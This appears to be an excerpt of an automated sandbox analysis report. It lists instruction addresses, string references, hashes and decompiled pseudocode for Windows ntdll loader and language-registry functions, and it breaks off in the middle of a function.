                                                                                  0x00eb8970
                                                                                  0x00eb8970
                                                                                  0x00eb8970
                                                                                  0x00eb8970
                                                                                  0x00eb8972
                                                                                  0x00eb8972
                                                                                  0x00eb8974
                                                                                  0x00000000
                                                                                  0x00eb897a
                                                                                  0x00eb897a
                                                                                  0x00eb897d
                                                                                  0x00000000
                                                                                  0x00eb8983
                                                                                  0x00f09c65
                                                                                  0x00f09c6d
                                                                                  0x00f09c72
                                                                                  0x00f09c75
                                                                                  0x00f09c75
                                                                                  0x00f09c82
                                                                                  0x00f09c86
                                                                                  0x00f09c87
                                                                                  0x00f09c88
                                                                                  0x00f09c89
                                                                                  0x00f09c8c
                                                                                  0x00f09c90
                                                                                  0x00f09c95
                                                                                  0x00f09c97
                                                                                  0x00f09ca0
                                                                                  0x00f09ca3
                                                                                  0x00f09ca9
                                                                                  0x00f09ca9
                                                                                  0x00000000
                                                                                  0x00f09ca9
                                                                                  0x00f09ca3
                                                                                  0x00000000
                                                                                  0x00f09c97
                                                                                  0x00eb897d
                                                                                  0x00000000
                                                                                  0x00eb8974
                                                                                  0x00eb8988
                                                                                  0x00eb8992
                                                                                  0x00eb8996
                                                                                  0x00000000
                                                                                  0x00eb8996
                                                                                  0x00eb894c
                                                                                  0x00000000
                                                                                  0x00eb8870
                                                                                  0x00eb887b
                                                                                  0x00eb887d
                                                                                  0x00eb887f
                                                                                  0x00eb8881
                                                                                  0x00eb8884
                                                                                  0x00eb8884
                                                                                  0x00eb8886
                                                                                  0x00eb8889
                                                                                  0x00eb888c
                                                                                  0x00eb888e
                                                                                  0x00eb8891
                                                                                  0x00eb8891
                                                                                  0x00eb8898
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb889a
                                                                                  0x00eb889b
                                                                                  0x00eb889e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb88a0
                                                                                  0x00eb88a8
                                                                                  0x00eb88b0
                                                                                  0x00eb88b2
                                                                                  0x00eb88d3
                                                                                  0x00eb88d5
                                                                                  0x00000000
                                                                                  0x00eb88d7
                                                                                  0x00eb88db
                                                                                  0x00eb88dc
                                                                                  0x00eb88e0
                                                                                  0x00eb88e8
                                                                                  0x00eb88ee
                                                                                  0x00eb88f0
                                                                                  0x00eb88f3
                                                                                  0x00eb88fc
                                                                                  0x00eb8901
                                                                                  0x00eb8906
                                                                                  0x00eb890c
                                                                                  0x00eb890c
                                                                                  0x00eb890f
                                                                                  0x00eb8916
                                                                                  0x00eb8917
                                                                                  0x00eb8918
                                                                                  0x00eb8919
                                                                                  0x00eb891a
                                                                                  0x00eb891f
                                                                                  0x00eb8921
                                                                                  0x00f09c52
                                                                                  0x00f09c55
                                                                                  0x00f09c5b
                                                                                  0x00f09cac
                                                                                  0x00f09cc0
                                                                                  0x00f09cc0
                                                                                  0x00f09c55
                                                                                  0x00eb8927
                                                                                  0x00eb8927
                                                                                  0x00eb892f
                                                                                  0x00eb8933
                                                                                  0x00000000
                                                                                  0x00eb88f5
                                                                                  0x00eb88f5
                                                                                  0x00000000
                                                                                  0x00eb88f7
                                                                                  0x00eb88f7
                                                                                  0x00eb88fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb88fa
                                                                                  0x00eb88f5
                                                                                  0x00eb88f3
                                                                                  0x00000000
                                                                                  0x00eb88d5
                                                                                  0x00000000
                                                                                  0x00eb88b2
                                                                                  0x00eb88c9
                                                                                  0x00000000
                                                                                  0x00eb88c9
                                                                                  0x00eb887f
                                                                                  0x00eb886a
                                                                                  0x00eb8857
                                                                                  0x00eb8852
                                                                                  0x00eb88bf
                                                                                  0x00eb88bf
                                                                                  0x00eb87aa
                                                                                  0x00eb87ad
                                                                                  0x00eb87ae
                                                                                  0x00eb87b4
                                                                                  0x00eb87b5
                                                                                  0x00eb87b6
                                                                                  0x00eb87b8
                                                                                  0x00eb87bd
                                                                                  0x00eb87c1
                                                                                  0x00eb87f4
                                                                                  0x00eb87fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb87c1
                                                                                  0x00000000

                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 00F09C28
                                                                                  • LdrpDoPostSnapWork, xrefs: 00F09C1E
                                                                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00F09C18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 2994545307-1948996284
                                                                                  • Opcode ID: ca72588540b68db4f385029fa086f50b9103efec6bb7a3fecd9a288c8d123e37
                                                                                  • Instruction ID: 8159911d2271c76576645313dce7700f19b52d73da378add64775f745d66a1e9
                                                                                  • Opcode Fuzzy Hash: ca72588540b68db4f385029fa086f50b9103efec6bb7a3fecd9a288c8d123e37
                                                                                  • Instruction Fuzzy Hash: 0A91E331A0021A9BDF18DF54C981AFB73B9FF44318B94506AE949BB351EF70AD01DB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00EB7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				char _v24;
                                                                                  				signed int _t73;
                                                                                  				void* _t77;
                                                                                  				char* _t82;
                                                                                  				char* _t87;
                                                                                  				signed char* _t97;
                                                                                  				signed char _t102;
                                                                                  				intOrPtr _t107;
                                                                                  				signed char* _t108;
                                                                                  				intOrPtr _t112;
                                                                                  				intOrPtr _t124;
                                                                                  				intOrPtr _t125;
                                                                                  				intOrPtr _t126;
                                                                                  
                                                                                  				_t107 = __edx;
                                                                                  				_v12 = __ecx;
                                                                                  				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                  				_t124 = 0;
                                                                                  				_v20 = __edx;
                                                                                  				if(E00EBCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                  					_t112 = _v8;
                                                                                  				} else {
                                                                                  					_t112 = 0;
                                                                                  					_v8 = 0;
                                                                                  				}
                                                                                  				if(_t112 != 0) {
                                                                                  					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                  						_t124 = 0xc000007b;
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                  					 *(_t125 + 0x34) = _t73;
                                                                                  					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					 *(_t125 + 0x34) = _t73 | L"ersists, try restarting the physical computer.\r\n";
                                                                                  					_t124 = E00EAC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                  					if(_t124 < 0) {
                                                                                  						goto L8;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  				} else {
                                                                                  					L3:
                                                                                  					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                  						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                  						L8:
                                                                                  						return _t124;
                                                                                  					}
                                                                                  					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                  						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                  							goto L5;
                                                                                  						}
                                                                                  						_t102 =  *0xf95780; // 0x0
                                                                                  						if((_t102 & 0x00000003) != 0) {
                                                                                  							E00F25510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                  							_t102 =  *0xf95780; // 0x0
                                                                                  						}
                                                                                  						if((_t102 & 0x00000010) != 0) {
                                                                                  							asm("int3");
                                                                                  						}
                                                                                  						_t124 = 0xc0000428;
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					L5:
                                                                                  					if(( *(_t125 + 0x34) & L"ersists, try restarting the physical computer.\r\n") != 0) {
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					_t77 = _a4 - 0x40000003;
                                                                                  					if(_t77 == 0 || _t77 == 0x33) {
                                                                                  						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                  						if(E00EC7D50() != 0) {
                                                                                  							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                  						} else {
                                                                                  							_t82 = 0x7ffe0384;
                                                                                  						}
                                                                                  						_t108 = 0x7ffe0385;
                                                                                  						if( *_t82 != 0) {
                                                                                  							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                  								if(E00EC7D50() == 0) {
                                                                                  									_t97 = 0x7ffe0385;
                                                                                  								} else {
                                                                                  									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                  								}
                                                                                  								if(( *_t97 & 0x00000020) != 0) {
                                                                                  									E00F27016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						if(_a4 != 0x40000003) {
                                                                                  							L14:
                                                                                  							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                  							if(E00EC7D50() != 0) {
                                                                                  								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                  							} else {
                                                                                  								_t87 = 0x7ffe0384;
                                                                                  							}
                                                                                  							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                  								if(E00EC7D50() != 0) {
                                                                                  									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                  								}
                                                                                  								if(( *_t108 & 0x00000020) != 0) {
                                                                                  									E00F27016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                  								}
                                                                                  							}
                                                                                  							goto L8;
                                                                                  						} else {
                                                                                  							_v16 = _t125 + 0x24;
                                                                                  							_t124 = E00EDA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                  							if(_t124 < 0) {
                                                                                  								E00EAB1E1(_t124, 0x1490, 0, _v16);
                                                                                  								goto L8;
                                                                                  							}
                                                                                  							goto L14;
                                                                                  						}
                                                                                  					} else {
                                                                                  						goto L8;
                                                                                  					}
                                                                                  				}
                                                                                  			}




















                                                                                  0x00eb7e4c
                                                                                  0x00eb7e50
                                                                                  0x00eb7e55
                                                                                  0x00eb7e58
                                                                                  0x00eb7e5d
                                                                                  0x00eb7e71
                                                                                  0x00eb7f33
                                                                                  0x00eb7e77
                                                                                  0x00eb7e77
                                                                                  0x00eb7e79
                                                                                  0x00eb7e79
                                                                                  0x00eb7e7e
                                                                                  0x00eb7f45
                                                                                  0x00f09848
                                                                                  0x00000000
                                                                                  0x00f09848
                                                                                  0x00eb7f4e
                                                                                  0x00eb7f53
                                                                                  0x00eb7f5a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f0985a
                                                                                  0x00f09862
                                                                                  0x00f09866
                                                                                  0x00000000
                                                                                  0x00f0986c
                                                                                  0x00000000
                                                                                  0x00f0986c
                                                                                  0x00eb7e84
                                                                                  0x00eb7e84
                                                                                  0x00eb7e8d
                                                                                  0x00f09871
                                                                                  0x00eb7eb8
                                                                                  0x00eb7ec0
                                                                                  0x00eb7ec0
                                                                                  0x00eb7e9a
                                                                                  0x00f0987e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f09884
                                                                                  0x00f0988b
                                                                                  0x00f098a7
                                                                                  0x00f098ac
                                                                                  0x00f098b1
                                                                                  0x00f098b6
                                                                                  0x00f098b8
                                                                                  0x00f098b8
                                                                                  0x00f098b9
                                                                                  0x00000000
                                                                                  0x00f098b9
                                                                                  0x00eb7ea0
                                                                                  0x00eb7ea7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb7eac
                                                                                  0x00eb7eb1
                                                                                  0x00eb7ec6
                                                                                  0x00eb7ed0
                                                                                  0x00f098cc
                                                                                  0x00eb7ed6
                                                                                  0x00eb7ed6
                                                                                  0x00eb7ed6
                                                                                  0x00eb7ede
                                                                                  0x00eb7ee3
                                                                                  0x00f098e3
                                                                                  0x00f098f0
                                                                                  0x00f09902
                                                                                  0x00f098f2
                                                                                  0x00f098fb
                                                                                  0x00f098fb
                                                                                  0x00f09907
                                                                                  0x00f0991d
                                                                                  0x00f0991d
                                                                                  0x00f09907
                                                                                  0x00f098e3
                                                                                  0x00eb7ef0
                                                                                  0x00eb7f14
                                                                                  0x00eb7f14
                                                                                  0x00eb7f1e
                                                                                  0x00f09946
                                                                                  0x00eb7f24
                                                                                  0x00eb7f24
                                                                                  0x00eb7f24
                                                                                  0x00eb7f2c
                                                                                  0x00f0996a
                                                                                  0x00f09975
                                                                                  0x00f09975
                                                                                  0x00f0997e
                                                                                  0x00f09993
                                                                                  0x00f09993
                                                                                  0x00f0997e
                                                                                  0x00000000
                                                                                  0x00eb7ef2
                                                                                  0x00eb7efc
                                                                                  0x00eb7f0a
                                                                                  0x00eb7f0e
                                                                                  0x00f09933
                                                                                  0x00000000
                                                                                  0x00f09933
                                                                                  0x00000000
                                                                                  0x00eb7f0e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb7eb1

                                                                                  Strings
                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 00F09891
                                                                                  • LdrpCompleteMapModule, xrefs: 00F09898
                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 00F098A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                  • API String ID: 0-1676968949
                                                                                  • Opcode ID: 41e4027c15a4be54fb898bc03e7e7b2da74957854abceaf88c7fcf501c553ec4
                                                                                  • Instruction ID: 69de6294569c423a7ff1c86dc45da8e1a5f1860c8d0b4d23fbe81c5ecfec107b
                                                                                  • Opcode Fuzzy Hash: 41e4027c15a4be54fb898bc03e7e7b2da74957854abceaf88c7fcf501c553ec4
                                                                                  • Instruction Fuzzy Hash: 75512531A087449BDB21CB68C984BAB7BE4EF85314F14159DE891BBBE2D774ED00EB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 93%
                                                                                  			E00EAE620(void* __ecx, short* __edx, short* _a4) {
                                                                                  				char _v16;
                                                                                  				char _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char* _v28;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				char _v44;
                                                                                  				signed int _v48;
                                                                                  				intOrPtr _v52;
                                                                                  				void* _v56;
                                                                                  				void* _v60;
                                                                                  				char _v64;
                                                                                  				void* _v68;
                                                                                  				void* _v76;
                                                                                  				void* _v84;
                                                                                  				signed int _t59;
                                                                                  				signed int _t74;
                                                                                  				signed short* _t75;
                                                                                  				signed int _t76;
                                                                                  				signed short* _t78;
                                                                                  				signed int _t83;
                                                                                  				short* _t93;
                                                                                  				signed short* _t94;
                                                                                  				short* _t96;
                                                                                  				void* _t97;
                                                                                  				signed int _t99;
                                                                                  				void* _t101;
                                                                                  				void* _t102;
                                                                                  
                                                                                  				_t80 = __ecx;
                                                                                  				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                  				_t96 = __edx;
                                                                                  				_v44 = __edx;
                                                                                  				_t78 = 0;
                                                                                  				_v56 = 0;
                                                                                  				if(__ecx == 0 || __edx == 0) {
                                                                                  					L28:
                                                                                  					_t97 = 0xc000000d;
                                                                                  				} else {
                                                                                  					_t93 = _a4;
                                                                                  					if(_t93 == 0) {
                                                                                  						goto L28;
                                                                                  					}
                                                                                  					_t78 = E00EAF358(__ecx, 0xac);
                                                                                  					if(_t78 == 0) {
                                                                                  						_t97 = 0xc0000017;
                                                                                  						L6:
                                                                                  						if(_v56 != 0) {
                                                                                  							_push(_v56);
                                                                                  							E00EE95D0();
                                                                                  						}
                                                                                  						if(_t78 != 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                  						}
                                                                                  						return _t97;
                                                                                  					}
                                                                                  					E00EEFA60(_t78, 0, 0x158);
                                                                                  					_v48 = _v48 & 0x00000000;
                                                                                  					_t102 = _t101 + 0xc;
                                                                                  					 *_t96 = 0;
                                                                                  					 *_t93 = 0;
                                                                                  					E00EEBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                  					_v36 = 0x18;
                                                                                  					_v28 =  &_v44;
                                                                                  					_v64 = 0;
                                                                                  					_push( &_v36);
                                                                                  					_push(0x20019);
                                                                                  					_v32 = 0;
                                                                                  					_push( &_v64);
                                                                                  					_v24 = 0x40;
                                                                                  					_v20 = 0;
                                                                                  					_v16 = 0;
                                                                                  					_t97 = E00EE9600();
                                                                                  					if(_t97 < 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					E00EEBB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                  					_push(0);
                                                                                  					_v48 = 4;
                                                                                  					_t97 = L00EAF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                  					if(_t97 >= 0) {
                                                                                  						if(_v52 != 1) {
                                                                                  							L17:
                                                                                  							_t97 = 0xc0000001;
                                                                                  							goto L6;
                                                                                  						}
                                                                                  						_t59 =  *_t78 & 0x0000ffff;
                                                                                  						_t94 = _t78;
                                                                                  						_t83 = _t59;
                                                                                  						if(_t59 == 0) {
                                                                                  							L19:
                                                                                  							if(_t83 == 0) {
                                                                                  								L23:
                                                                                  								E00EEBB40(_t83, _t102 + 0x24, _t78);
                                                                                  								if(L00EB43C0( &_v48,  &_v64) == 0) {
                                                                                  									goto L17;
                                                                                  								}
                                                                                  								_t84 = _v48;
                                                                                  								 *_v48 = _v56;
                                                                                  								if( *_t94 != 0) {
                                                                                  									E00EEBB40(_t84, _t102 + 0x24, _t94);
                                                                                  									if(L00EB43C0( &_v48,  &_v64) != 0) {
                                                                                  										 *_a4 = _v56;
                                                                                  									} else {
                                                                                  										_t97 = 0xc0000001;
                                                                                  										 *_v48 = 0;
                                                                                  									}
                                                                                  								}
                                                                                  								goto L6;
                                                                                  							}
                                                                                  							_t83 = _t83 & 0x0000ffff;
                                                                                  							while(_t83 == 0x20) {
                                                                                  								_t94 =  &(_t94[1]);
                                                                                  								_t74 =  *_t94 & 0x0000ffff;
                                                                                  								_t83 = _t74;
                                                                                  								if(_t74 != 0) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							}
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							goto L14;
                                                                                  						}
                                                                                  						while(1) {
                                                                                  							L14:
                                                                                  							_t27 =  &(_t94[1]); // 0x2
                                                                                  							_t75 = _t27;
                                                                                  							if(_t83 == 0x2c) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t94 = _t75;
                                                                                  							_t76 =  *_t94 & 0x0000ffff;
                                                                                  							_t83 = _t76;
                                                                                  							if(_t76 != 0) {
                                                                                  								continue;
                                                                                  							}
                                                                                  							goto L23;
                                                                                  						}
                                                                                  						 *_t94 = 0;
                                                                                  						_t94 = _t75;
                                                                                  						_t83 =  *_t75 & 0x0000ffff;
                                                                                  						goto L19;
                                                                                  					}
                                                                                  				}
                                                                                  			}































                                                                                  0x00eae620
                                                                                  0x00eae628
                                                                                  0x00eae62f
                                                                                  0x00eae631
                                                                                  0x00eae635
                                                                                  0x00eae637
                                                                                  0x00eae63e
                                                                                  0x00f05503
                                                                                  0x00f05503
                                                                                  0x00eae64c
                                                                                  0x00eae64c
                                                                                  0x00eae651
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eae661
                                                                                  0x00eae665
                                                                                  0x00f0542a
                                                                                  0x00eae715
                                                                                  0x00eae71a
                                                                                  0x00eae71c
                                                                                  0x00eae720
                                                                                  0x00eae720
                                                                                  0x00eae727
                                                                                  0x00eae736
                                                                                  0x00eae736
                                                                                  0x00eae743
                                                                                  0x00eae743
                                                                                  0x00eae673
                                                                                  0x00eae678
                                                                                  0x00eae67d
                                                                                  0x00eae682
                                                                                  0x00eae685
                                                                                  0x00eae692
                                                                                  0x00eae69b
                                                                                  0x00eae6a3
                                                                                  0x00eae6ad
                                                                                  0x00eae6b1
                                                                                  0x00eae6b2
                                                                                  0x00eae6bb
                                                                                  0x00eae6bf
                                                                                  0x00eae6c0
                                                                                  0x00eae6c8
                                                                                  0x00eae6cc
                                                                                  0x00eae6d5
                                                                                  0x00eae6d9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eae6e5
                                                                                  0x00eae6ea
                                                                                  0x00eae6f9
                                                                                  0x00eae70b
                                                                                  0x00eae70f
                                                                                  0x00f05439
                                                                                  0x00f0545e
                                                                                  0x00f0545e
                                                                                  0x00000000
                                                                                  0x00f0545e
                                                                                  0x00f0543b
                                                                                  0x00f0543e
                                                                                  0x00f05440
                                                                                  0x00f05445
                                                                                  0x00f05472
                                                                                  0x00f05475
                                                                                  0x00f0548d
                                                                                  0x00f05493
                                                                                  0x00f054a9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f054ab
                                                                                  0x00f054b4
                                                                                  0x00f054bc
                                                                                  0x00f054c8
                                                                                  0x00f054de
                                                                                  0x00f054fb
                                                                                  0x00f054e0
                                                                                  0x00f054e6
                                                                                  0x00f054eb
                                                                                  0x00f054eb
                                                                                  0x00f054de
                                                                                  0x00000000
                                                                                  0x00f054bc
                                                                                  0x00f05477
                                                                                  0x00f0547a
                                                                                  0x00f05480
                                                                                  0x00f05483
                                                                                  0x00f05486
                                                                                  0x00f0548b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f0548b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f05447
                                                                                  0x00f05447
                                                                                  0x00f05447
                                                                                  0x00f05447
                                                                                  0x00f0544e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f05450
                                                                                  0x00f05452
                                                                                  0x00f05455
                                                                                  0x00f0545a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f0545c
                                                                                  0x00f0546a
                                                                                  0x00f0546d
                                                                                  0x00f0546f
                                                                                  0x00000000
                                                                                  0x00f0546f
                                                                                  0x00eae70f

                                                                                  Strings
                                                                                  • @, xrefs: 00EAE6C0
                                                                                  • InstallLanguageFallback, xrefs: 00EAE6DB
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00EAE68C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                  • API String ID: 0-1757540487
                                                                                  • Opcode ID: ebbdef4d77010fbfdc1b47b5d49339a59c8588661a5ae6642fa3b95dd8ea4b7f
                                                                                  • Instruction ID: a173cc9e3667c19bdf12b155dfd771b1b7a5fd3917ddbbef4ab138cf4c7b1fa7
                                                                                  • Opcode Fuzzy Hash: ebbdef4d77010fbfdc1b47b5d49339a59c8588661a5ae6642fa3b95dd8ea4b7f
                                                                                  • Instruction Fuzzy Hash: 6151D3B69043459BC710DF24C450AABB3E8BF88714F04192EF985EB291F770DD44DBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00F251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				signed short* _t63;
                                                                                  				signed int _t64;
                                                                                  				signed int _t65;
                                                                                  				signed int _t67;
                                                                                  				intOrPtr _t74;
                                                                                  				intOrPtr _t84;
                                                                                  				intOrPtr _t88;
                                                                                  				intOrPtr _t94;
                                                                                  				void* _t100;
                                                                                  				void* _t103;
                                                                                  				intOrPtr _t105;
                                                                                  				signed int _t106;
                                                                                  				short* _t108;
                                                                                  				signed int _t110;
                                                                                  				signed int _t113;
                                                                                  				signed int* _t115;
                                                                                  				signed short* _t117;
                                                                                  				void* _t118;
                                                                                  				void* _t119;
                                                                                  
                                                                                  				_push(0x80);
                                                                                  				_push(0xf805f0);
                                                                                  				E00EFD0E8(__ebx, __edi, __esi);
                                                                                  				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                  				_t115 =  *(_t118 + 0xc);
                                                                                  				 *(_t118 - 0x7c) = _t115;
                                                                                  				 *((char*)(_t118 - 0x65)) = 0;
                                                                                  				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                  				_t113 = 0;
                                                                                  				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                  				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                  				_t100 = __ecx;
                                                                                  				if(_t100 == 0) {
                                                                                  					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                  					E00EBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                  					 *((char*)(_t118 - 0x65)) = 1;
                                                                                  					_t63 =  *(_t118 - 0x90);
                                                                                  					_t101 = _t63[2];
                                                                                  					_t64 =  *_t63 & 0x0000ffff;
                                                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                  					L20:
                                                                                  					_t65 = _t64 >> 1;
                                                                                  					L21:
                                                                                  					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                  					if(_t108 == 0) {
                                                                                  						L27:
                                                                                  						 *_t115 = _t65 + 1;
                                                                                  						_t67 = 0xc0000023;
                                                                                  						L28:
                                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                  						L29:
                                                                                  						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                  						E00F253CA(0);
                                                                                  						return E00EFD130(0, _t113, _t115);
                                                                                  					}
                                                                                  					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                  						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                  							 *_t108 = 0;
                                                                                  						}
                                                                                  						goto L27;
                                                                                  					}
                                                                                  					 *_t115 = _t65;
                                                                                  					_t115 = _t65 + _t65;
                                                                                  					E00EEF3E0(_t108, _t101, _t115);
                                                                                  					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                  					_t67 = 0;
                                                                                  					goto L28;
                                                                                  				}
                                                                                  				_t103 = _t100 - 1;
                                                                                  				if(_t103 == 0) {
                                                                                  					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                  					_t74 = E00EC3690(1, _t117, 0xe81810, _t118 - 0x74);
                                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                  					_t101 = _t117[2];
                                                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                  					if(_t74 < 0) {
                                                                                  						_t64 =  *_t117 & 0x0000ffff;
                                                                                  						_t115 =  *(_t118 - 0x7c);
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                  					_t115 =  *(_t118 - 0x7c);
                                                                                  					goto L21;
                                                                                  				}
                                                                                  				if(_t103 == 1) {
                                                                                  					_t105 = 4;
                                                                                  					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                  					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                  					_push(_t118 - 0x70);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push(_t105);
                                                                                  					_push(_t118 - 0x78);
                                                                                  					_push(0x6b);
                                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = E00EEAA90();
                                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                  					_t113 = L00EC4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                  					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                  					if(_t113 != 0) {
                                                                                  						_push(_t118 - 0x70);
                                                                                  						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                  						_push(_t113);
                                                                                  						_push(4);
                                                                                  						_push(_t118 - 0x78);
                                                                                  						_push(0x6b);
                                                                                  						_t84 = E00EEAA90();
                                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                  						if(_t84 < 0) {
                                                                                  							goto L29;
                                                                                  						}
                                                                                  						_t110 = 0;
                                                                                  						_t106 = 0;
                                                                                  						while(1) {
                                                                                  							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                  							 *(_t118 - 0x88) = _t106;
